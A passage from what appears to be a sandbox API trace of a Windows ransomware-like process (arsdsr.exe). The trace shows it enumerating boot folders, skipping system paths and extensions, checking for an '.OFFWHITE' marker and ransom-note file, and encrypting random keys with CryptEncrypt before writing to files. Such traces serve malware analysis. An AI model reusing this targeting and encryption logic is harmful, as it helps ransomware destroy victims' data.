ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.262] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.262] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.262] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.262] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.262] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0082.262] lstrcmpiW (lpString1="chs_boot.ttf", lpString2=".") returned 1 [0082.262] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="..") returned 1 [0082.262] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="...") returned 1 [0082.262] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="windows") returned -1 [0082.262] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="$recycle.bin") returned 1 [0082.262] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="rsa") returned -1 [0082.262] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="ntuser.dat") returned -1 [0082.262] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="programdata") returned -1 [0082.262] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="appdata") returned 1 [0082.262] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="program files") returned -1 [0082.262] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="program files (x86)") returned -1 [0082.262] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\Fonts\\" | out: lpString1="C:/Boot\\Fonts\\") returned="C:/Boot\\Fonts\\" [0082.262] lstrcatW (in: lpString1="C:/Boot\\Fonts\\", lpString2="chs_boot.ttf" | out: lpString1="C:/Boot\\Fonts\\chs_boot.ttf") returned="C:/Boot\\Fonts\\chs_boot.ttf" [0082.263] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.263] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.263] PathFindExtensionW (pszPath="chs_boot.ttf") returned=".ttf" [0082.263] lstrcmpiW (lpString1=".ttf", lpString2=".exe") returned 1 [0082.263] lstrcmpiW (lpString1=".ttf", lpString2=".log") returned 1 [0082.263] lstrcmpiW (lpString1=".ttf", lpString2=".cab") returned 1 [0082.263] lstrcmpiW (lpString1=".ttf", lpString2=".cmd") returned 1 [0082.263] lstrcmpiW (lpString1=".ttf", lpString2=".com") returned 1 [0082.263] lstrcmpiW (lpString1=".ttf", lpString2=".cpl") returned 1 [0082.263] lstrcmpiW (lpString1=".ttf", lpString2=".ini") returned 1 [0082.263] lstrcmpiW (lpString1=".ttf", lpString2=".dll") returned 1 [0082.263] lstrcmpiW (lpString1=".ttf", lpString2=".url") returned -1 [0082.263] lstrcmpiW (lpString1=".ttf", lpString2=".ttf") returned 0 [0082.263] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0082.263] lstrcmpiW (lpString1="cht_boot.ttf", lpString2=".") returned 1 [0082.263] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="..") returned 1 [0082.263] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="...") returned 1 [0082.263] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="windows") returned -1 [0082.263] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="$recycle.bin") returned 1 [0082.263] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="rsa") returned -1 [0082.263] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="ntuser.dat") returned -1 [0082.263] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="programdata") returned -1 [0082.263] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="appdata") returned 1 [0082.263] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="program files") returned -1 [0082.264] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="program files (x86)") returned -1 [0082.264] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\Fonts\\" | out: lpString1="C:/Boot\\Fonts\\") returned="C:/Boot\\Fonts\\" [0082.264] lstrcatW (in: lpString1="C:/Boot\\Fonts\\", lpString2="cht_boot.ttf" | out: lpString1="C:/Boot\\Fonts\\cht_boot.ttf") returned="C:/Boot\\Fonts\\cht_boot.ttf" [0082.264] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.264] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.264] PathFindExtensionW (pszPath="cht_boot.ttf") returned=".ttf" [0082.264] lstrcmpiW (lpString1=".ttf", lpString2=".exe") returned 1 [0082.264] lstrcmpiW (lpString1=".ttf", lpString2=".log") returned 1 [0082.264] lstrcmpiW (lpString1=".ttf", lpString2=".cab") returned 1 [0082.264] lstrcmpiW (lpString1=".ttf", lpString2=".cmd") returned 1 [0082.264] lstrcmpiW (lpString1=".ttf", lpString2=".com") returned 1 [0082.264] lstrcmpiW (lpString1=".ttf", lpString2=".cpl") returned 1 [0082.264] lstrcmpiW (lpString1=".ttf", lpString2=".ini") returned 1 [0082.264] lstrcmpiW (lpString1=".ttf", lpString2=".dll") returned 1 [0082.264] lstrcmpiW (lpString1=".ttf", lpString2=".url") returned -1 [0082.264] lstrcmpiW (lpString1=".ttf", lpString2=".ttf") returned 0 [0082.264] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0082.264] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2=".") returned 1 [0082.264] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="..") returned 1 [0082.264] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="...") returned 1 [0082.264] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="windows") returned -1 [0082.264] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="$recycle.bin") returned 1 [0082.264] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="rsa") returned -1 [0082.264] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="ntuser.dat") returned -1 [0082.265] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="programdata") returned -1 [0082.265] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="appdata") returned 1 [0082.265] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="program files") returned -1 [0082.265] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="program files (x86)") returned -1 [0082.265] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\Fonts\\" | out: lpString1="C:/Boot\\Fonts\\") returned="C:/Boot\\Fonts\\" [0082.265] lstrcatW (in: lpString1="C:/Boot\\Fonts\\", lpString2="jpn_boot.ttf" | out: lpString1="C:/Boot\\Fonts\\jpn_boot.ttf") returned="C:/Boot\\Fonts\\jpn_boot.ttf" [0082.265] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.265] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.265] PathFindExtensionW (pszPath="jpn_boot.ttf") returned=".ttf" [0082.265] lstrcmpiW (lpString1=".ttf", lpString2=".exe") returned 1 [0082.265] lstrcmpiW (lpString1=".ttf", lpString2=".log") returned 1 [0082.265] lstrcmpiW (lpString1=".ttf", lpString2=".cab") returned 1 [0082.265] lstrcmpiW (lpString1=".ttf", lpString2=".cmd") returned 1 [0082.265] lstrcmpiW (lpString1=".ttf", lpString2=".com") returned 1 [0082.265] lstrcmpiW (lpString1=".ttf", lpString2=".cpl") returned 1 [0082.265] lstrcmpiW (lpString1=".ttf", lpString2=".ini") returned 1 [0082.265] lstrcmpiW (lpString1=".ttf", lpString2=".dll") returned 1 [0082.265] lstrcmpiW (lpString1=".ttf", lpString2=".url") returned -1 [0082.265] lstrcmpiW (lpString1=".ttf", lpString2=".ttf") returned 0 [0082.265] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0082.265] lstrcmpiW (lpString1="kor_boot.ttf", lpString2=".") returned 1 [0082.265] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="..") returned 1 [0082.265] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="...") returned 1 [0082.265] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="windows") returned -1 [0082.265] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="$recycle.bin") returned 1 [0082.265] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="rsa") returned -1 [0082.266] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="ntuser.dat") returned -1 [0082.266] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="programdata") returned -1 [0082.266] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="appdata") returned 1 [0082.266] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="program files") returned -1 [0082.266] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="program files (x86)") returned -1 [0082.266] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\Fonts\\" | out: lpString1="C:/Boot\\Fonts\\") returned="C:/Boot\\Fonts\\" [0082.266] lstrcatW (in: lpString1="C:/Boot\\Fonts\\", lpString2="kor_boot.ttf" | out: lpString1="C:/Boot\\Fonts\\kor_boot.ttf") returned="C:/Boot\\Fonts\\kor_boot.ttf" [0082.266] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.266] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.266] PathFindExtensionW (pszPath="kor_boot.ttf") returned=".ttf" [0082.266] lstrcmpiW (lpString1=".ttf", lpString2=".exe") returned 1 [0082.266] lstrcmpiW (lpString1=".ttf", lpString2=".log") returned 1 [0082.266] lstrcmpiW (lpString1=".ttf", lpString2=".cab") returned 1 [0082.266] lstrcmpiW (lpString1=".ttf", lpString2=".cmd") returned 1 [0082.266] lstrcmpiW (lpString1=".ttf", lpString2=".com") returned 1 [0082.266] lstrcmpiW (lpString1=".ttf", lpString2=".cpl") returned 1 [0082.266] lstrcmpiW (lpString1=".ttf", lpString2=".ini") returned 1 [0082.266] lstrcmpiW (lpString1=".ttf", lpString2=".dll") returned 1 [0082.266] lstrcmpiW (lpString1=".ttf", lpString2=".url") returned -1 [0082.266] lstrcmpiW (lpString1=".ttf", lpString2=".ttf") returned 0 [0082.266] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0082.266] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2=".") returned 1 [0082.266] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="..") returned 1 [0082.267] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="...") returned 1 [0082.267] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="windows") returned -1 [0082.267] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="$recycle.bin") returned 1 [0082.267] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="rsa") returned 1 [0082.267] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="ntuser.dat") returned 1 [0082.267] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="programdata") returned 1 [0082.267] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="appdata") returned 1 [0082.267] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="program files") returned 1 [0082.267] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="program files (x86)") returned 1 [0082.267] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\Fonts\\" | out: lpString1="C:/Boot\\Fonts\\") returned="C:/Boot\\Fonts\\" [0082.267] lstrcatW (in: lpString1="C:/Boot\\Fonts\\", lpString2="wgl4_boot.ttf" | out: lpString1="C:/Boot\\Fonts\\wgl4_boot.ttf") returned="C:/Boot\\Fonts\\wgl4_boot.ttf" [0082.267] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.267] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.267] PathFindExtensionW (pszPath="wgl4_boot.ttf") returned=".ttf" [0082.267] lstrcmpiW (lpString1=".ttf", lpString2=".exe") returned 1 [0082.267] lstrcmpiW (lpString1=".ttf", lpString2=".log") returned 1 [0082.267] lstrcmpiW (lpString1=".ttf", lpString2=".cab") returned 1 [0082.267] lstrcmpiW (lpString1=".ttf", lpString2=".cmd") returned 1 [0082.267] lstrcmpiW (lpString1=".ttf", lpString2=".com") returned 1 [0082.267] lstrcmpiW (lpString1=".ttf", lpString2=".cpl") returned 1 [0082.267] lstrcmpiW (lpString1=".ttf", lpString2=".ini") returned 1 [0082.267] lstrcmpiW (lpString1=".ttf", lpString2=".dll") returned 1 [0082.267] lstrcmpiW (lpString1=".ttf", lpString2=".url") returned -1 [0082.267] lstrcmpiW (lpString1=".ttf", lpString2=".ttf") returned 0 [0082.267] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0082.268] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.268] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0082.268] lstrcmpiW (lpString1="fr-FR", lpString2=".") returned 1 [0082.268] lstrcmpiW (lpString1="fr-FR", lpString2="..") returned 1 [0082.268] lstrcmpiW (lpString1="fr-FR", lpString2="...") returned 1 [0082.268] lstrcmpiW (lpString1="fr-FR", lpString2="windows") returned -1 [0082.268] lstrcmpiW (lpString1="fr-FR", lpString2="$recycle.bin") returned 1 [0082.268] lstrcmpiW (lpString1="fr-FR", lpString2="rsa") returned -1 [0082.268] lstrcmpiW (lpString1="fr-FR", lpString2="ntuser.dat") returned -1 [0082.268] lstrcmpiW (lpString1="fr-FR", lpString2="programdata") returned -1 [0082.268] lstrcmpiW (lpString1="fr-FR", lpString2="appdata") returned 1 [0082.268] lstrcmpiW (lpString1="fr-FR", lpString2="program files") returned -1 [0082.268] lstrcmpiW (lpString1="fr-FR", lpString2="program files (x86)") returned -1 [0082.268] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.268] lstrcatW (in: lpString1="C:/Boot\\", lpString2="fr-FR" | out: lpString1="C:/Boot\\fr-FR") returned="C:/Boot\\fr-FR" [0082.268] lstrcatW (in: lpString1="C:/Boot\\fr-FR", lpString2="\\" | out: lpString1="C:/Boot\\fr-FR\\") returned="C:/Boot\\fr-FR\\" [0082.268] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\fr-FR\\" | out: lpString1="C:/Boot\\fr-FR\\") returned="C:/Boot\\fr-FR\\" [0082.268] lstrcatW (in: lpString1="C:/Boot\\fr-FR\\", lpString2="*.*" | out: lpString1="C:/Boot\\fr-FR\\*.*") returned="C:/Boot\\fr-FR\\*.*" [0082.268] FindFirstFileW (in: lpFileName="C:/Boot\\fr-FR\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.269] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.269] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.270] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.270] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.270] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.270] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.270] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.270] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.270] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.270] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.270] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.270] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.270] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.270] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.270] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.270] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.270] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\fr-FR\\" | out: lpString1="C:/Boot\\fr-FR\\") returned="C:/Boot\\fr-FR\\" [0082.270] lstrcatW (in: lpString1="C:/Boot\\fr-FR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\fr-FR\\bootmgr.exe.mui") returned="C:/Boot\\fr-FR\\bootmgr.exe.mui" [0082.270] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.270] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.270] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.270] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.270] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.270] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.270] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.270] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.270] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.271] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.271] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.271] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.271] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.271] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.271] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.271] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.271] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.271] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.271] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.271] GetProcessHeap () returned 0x500000 [0082.271] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bc60 [0082.271] CreateFileW (lpFileName="C:/Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.271] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.271] GetProcessHeap () returned 0x500000 [0082.271] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a840 [0082.271] GetProcessHeap () returned 0x500000 [0082.271] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a858 [0082.271] GetProcessHeap () returned 0x500000 [0082.271] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5200f0 [0082.271] GetProcessHeap () returned 0x500000 [0082.271] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5201f8 [0082.272] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.272] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.272] SystemFunction036 (in: RandomBuffer=0x52a840, RandomBufferLength=0x10 | out: RandomBuffer=0x52a840) returned 1 [0082.272] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.272] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.272] SystemFunction036 (in: RandomBuffer=0x52a858, RandomBufferLength=0x10 | out: RandomBuffer=0x52a858) returned 1 [0082.272] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.272] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.272] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5200f0*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x5200f0*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.272] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.272] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.272] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5201f8*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x5201f8*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.272] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.272] SetLastError (dwErrCode=0x0) [0082.272] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5200f0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.273] GetLastError () returned 0x6 [0082.273] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.273] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.273] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0082.273] lstrcmpiW (lpString1="hu-HU", lpString2=".") returned 1 [0082.273] lstrcmpiW (lpString1="hu-HU", lpString2="..") returned 1 [0082.273] lstrcmpiW (lpString1="hu-HU", lpString2="...") returned 1 [0082.273] lstrcmpiW (lpString1="hu-HU", lpString2="windows") returned -1 [0082.273] lstrcmpiW (lpString1="hu-HU", lpString2="$recycle.bin") returned 1 [0082.273] lstrcmpiW (lpString1="hu-HU", lpString2="rsa") returned -1 [0082.273] 